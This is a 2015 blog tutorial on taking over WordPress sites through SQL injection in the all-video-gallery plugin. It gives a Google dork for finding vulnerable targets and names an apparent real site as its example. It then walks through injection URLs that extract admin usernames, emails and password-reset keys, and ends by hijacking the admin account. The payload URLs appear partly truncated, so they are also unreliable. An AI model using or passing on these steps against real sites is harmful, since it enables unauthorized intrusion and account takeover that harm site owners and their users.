Monday, 17 August 2015

How to hack a wordpress site using SQLi injection

What is Wordpress??


WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.


Now lets move on to a hacking website.I have used here all-video-gallery(WordPress pluginSqli Vulnerability..
1>First we will find a Target using a Google dork 

inurl:all-video-gallery/config.php?vid=




http://www.ComeToHack.com/

Open New Tab image for better preview.......




2>Open any website.... In my case its juangrial.com.

http://www.ComeToHack.com/







  • Now lets do a sql injection....copy the exploit code then hit enter then see the Magic...Smile



http://www.cometohack.com/



Exploit Code for finding username & password: 
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--



http://www.cometohack.com/



You can also try this.......well Both will work the same.........


Exploit Code for finding username & email: 
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users-


4>We Got admin Email......Now Let!s reset it.....



http://www.cometohack.com/



For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php


"Then click on Lost Password"



http://www.cometohack.com/


5>Enter the Email we Got IN earlier steps...



http://www.cometohack.com/



6>Now come back and go to activation table....

Exploit Code for activation Key: 
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--




http://www.cometohack.com/

7>yeah!!!we got what we need now lets change the admin password...


goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username




http://www.cometohack.com/




8> Now open http://site.com/wp-admin 




and Login with new password..........xD




http://www.cometohack.com/

No comments:

Post a Comment